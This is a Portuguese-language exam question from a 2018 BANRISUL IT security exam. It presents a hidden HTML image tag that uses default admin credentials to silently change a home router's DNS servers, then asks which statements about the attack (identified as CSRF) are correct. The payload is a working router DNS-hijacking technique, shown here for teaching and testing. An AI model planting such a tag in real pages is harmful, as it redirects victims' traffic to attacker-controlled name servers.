Enunciados de questões e informações de concursos
Durante uma investigação de um incidente de segurança, constatou-se que o seguinte código estava embutido em um determinado website:
<img
src="http://admin:admin@10.1.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual
=2&dnsserver=198.51.100.1&dnsserver2=203.0.113.7&hostName=TLINK&Save=Save" style="display:none"
title="Carregando" alt="Carregando" width="100" heigth="40" />
Considere as afirmações abaixo sobre esse código.
I - Trata-se de ataque no qual se pretende modificar a configuração dos servidores de nomes de um dispositivo.
II - É um ataque que disponibiliza a configuração dos servidores de nomes utilizados pelo website.
III - Trata-se de um ataque do tipo Cross-Site Request Forgery (CSRF).
IV - É um ataque que pretende sobrecarregar o sistema com dados aleatórios para ter acesso a dados da memória de um servidor web.
V - Trata-se de uma requisição que informa ao website qual a configuração de resolução de nomes utilizada pelo usuário.
Quais estão corretas?
Outras questões do mesmo concurso: BANRISUL / Tec TI (BANRISUL) / 2018 / Segurança da Tecnologia da Informação
